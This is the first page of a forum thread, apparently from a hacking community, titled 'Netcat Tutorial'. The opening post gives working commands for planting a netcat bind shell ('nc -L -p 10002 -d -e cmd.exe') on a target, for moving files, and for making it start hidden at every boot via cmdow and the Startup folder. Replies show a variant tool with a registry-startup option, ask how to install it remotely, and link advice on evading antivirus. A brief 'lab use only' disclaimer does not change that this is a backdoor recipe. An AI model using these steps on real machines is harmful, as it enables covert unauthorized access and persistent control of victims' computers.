Page 1 of 4 123 ... LastLast
Results 1 to 10 of 32

Thread: Netcat Tutorial

  1. #1
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default Netcat Tutorial

    I was recently looking for tutorials on google on how to use netcat as a backdoor. I thought I might as well post what I learned. I personally ran netcat on my linux computer and used it as the attacker and use my windows computer for the target computer.


    --------------------------------------------------------------------------------------------------------
    ~~~~~~~~~~~~~~~~~~~~~NetCatTutorial~~~~~~~~~~~~~~~ ~~~~
    --------------------------------------------------------------------------------------------------------


    Setting up and Connecting to a "target" comptuer
    First off make sure you have netcat installed on your "attacking" computer and your "target" computer. It does not matter if the computer is running unix or windows.

    To be able to connect to this "target" you must first start netcat on the "target" computer so your "attacking" computer can connect.

    Windows: Open up a command prompt and make sure you are in the same directory as nc.exe (netcat). Then type "nc -L -p 10002 -d -e cmd.exe"
    This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "nc 192.168.1.1 10002", this will connect you to your "target's" computer.
    (I have not tested this on linux, I have only backdoored windows so I am not positive these commands work properly"

    Unix: Open up a konsole. Then type "netcat -L -p 10002 -d -e konsole"
    This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "netcat 192.168.1.1 10002", this will connect you to your "target's" computer.


    -L Tells netcat to not close and wait for a connection
    -p Tells netcat which port to listen on
    -d Tells netcat to detach from the process we want it to run
    -e Tells netcat which program to run after the port is connected



    Transferring files through netcat

    To send a file through net cat enter the command "start nc.exe -l -p 1234 >file.txt" after you have connected to a windows machine. The -p 1234 is the port netcat listens on, >file.txt is the file to be recieved through netcat.
    Enter this in a konsole on the "attacking" computer "netcat 192.168.1.1 1234 <file.txt".

    Running netcat on startup hidden

    Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
    Now everytime the computer boots netcat will start hidden.
    --------------------------------------------------------------------------------------------------------
    Package with all files used in the tutorial.
    http://rapidshare.com/files/45658237...or.tar.gz.html

    Mirrors
    http://z13.zupload.com/download.php?...filepath=79690
    http://www.sendspace.com/file/526t92

    Disclaimer
    This tutorial is for educational use only, please only use this information in a closed lab enviroment.

    Credits
    www.ol-service.com/sikurezza/doc/netcat_eng.pdf
    A couple experts and a lot of information comes from this pdf

  2. #2

    Default Nice work thanks for sharing this,

    I was starting to search for this very topic and you explained it well. Thanks again. Keep up the great work!
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  3. #3
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default

    Thanks. :-)

  4. #4
    Junior Member g1ic7h's Avatar
    Join Date
    Jul 2007
    Posts
    73

    Talking

    NetCat, great tool. Joseph nice work and its good to see there is still interested in such an old tool. I've added more functions to the original program here is my help list:

    C:\MyCat 2.0\Release>wnc -h
    [WildCat (wnc - v1.0) NT]
    connect to somewhere: wnc [-options] hostname port[s] [ports] ...
    listen for inbound: wnc -l -p port [options] [hostname] [port]
    options:
    -b beep sound a internal beep when connected
    -B chatbeep sound a internal beep on inbound messages
    -c commands give commands for fun stuff
    -d detach detach from console, background mode
    -e prog inbound program to exec [dangerous!!]
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h help this cruft
    -H examples shows some usage examples
    -i secs delay interval for lines sent, ports scanned
    -l listen listen mode, for inbound connects
    -L relisten listen harder, re-listen on socket close
    -n numeric numeric-only IP addresses, no DNS
    -o file hex dump of traffic
    -p port local port number
    -P password password protect inbound/outbound connections
    -r randomize randomize local and remote ports
    -R reconnect to loop outbound connections in seconds
    -s addr local source address
    -S startup add startup key to registry
    -t telnet answer TELNET negotiation
    -u upd UDP mode
    -v verbose verbose [use twice to be more verbose]
    -w secs timeout for connects and final net reads
    -z scanning zero-I/O mode [used for scanning]
    port numbers can be individual or ranges: m-n [inclusive]

    the source code is out there, if you know any C-C++ you can build your own version adding the functions you see fit.

    peace

  5. #5
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    11

    Default

    ahh good old netcat with a nice tutorial. Thanks

  6. #6
    Member Mortifix's Avatar
    Join Date
    Nov 2006
    Posts
    113

    Default

    So netcat is basically a trojan? The main thing for me is getting netcat installed on the target PC. How do I do that without actually sitting at the target computer?

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Even the crappiest antivirus can detect netcat so its only useful for a one shot deal where you don't care if your attack is logged.

  8. #8
    banana88
    Guest

    Default

    Thanks thx

  9. #9
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    1

    Default

    Nice work! Where we can download source code or binary of your WildCat? Please

    Quote Originally Posted by g1ic7h View Post
    NetCat, great tool. Joseph nice work and its good to see there is still interested in such an old tool. I've added more functions to the original program here is my help list:

    C:\MyCat 2.0\Release>wnc -h
    [WildCat (wnc - v1.0) NT]
    connect to somewhere: wnc [-options] hostname port[s] [ports] ...
    listen for inbound: wnc -l -p port [options] [hostname] [port]
    options:
    -b beep sound a internal beep when connected
    -B chatbeep sound a internal beep on inbound messages
    -c commands give commands for fun stuff
    -d detach detach from console, background mode
    -e prog inbound program to exec [dangerous!!]
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h help this cruft
    -H examples shows some usage examples
    -i secs delay interval for lines sent, ports scanned
    -l listen listen mode, for inbound connects
    -L relisten listen harder, re-listen on socket close
    -n numeric numeric-only IP addresses, no DNS
    -o file hex dump of traffic
    -p port local port number
    -P password password protect inbound/outbound connections
    -r randomize randomize local and remote ports
    -R reconnect to loop outbound connections in seconds
    -s addr local source address
    -S startup add startup key to registry
    -t telnet answer TELNET negotiation
    -u upd UDP mode
    -v verbose verbose [use twice to be more verbose]
    -w secs timeout for connects and final net reads
    -z scanning zero-I/O mode [used for scanning]
    port numbers can be individual or ranges: m-n [inclusive]

    the source code is out there, if you know any C-C++ you can build your own version adding the functions you see fit.

    peace

  10. #10
    Just burned his ISO Fletch's Avatar
    Join Date
    Sep 2007
    Posts
    11

    Default

    " Even the crappiest antivirus can detect netcat so its only useful for a one shot deal where you don't care if your attack is logged."
    A good article on how to avoid AV detection by altering Netcat"s signature can be found at :
    http://packetstormsecurity.org/paper...ack_Netcat.pdf

    Fletch

Page 1 of 4 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •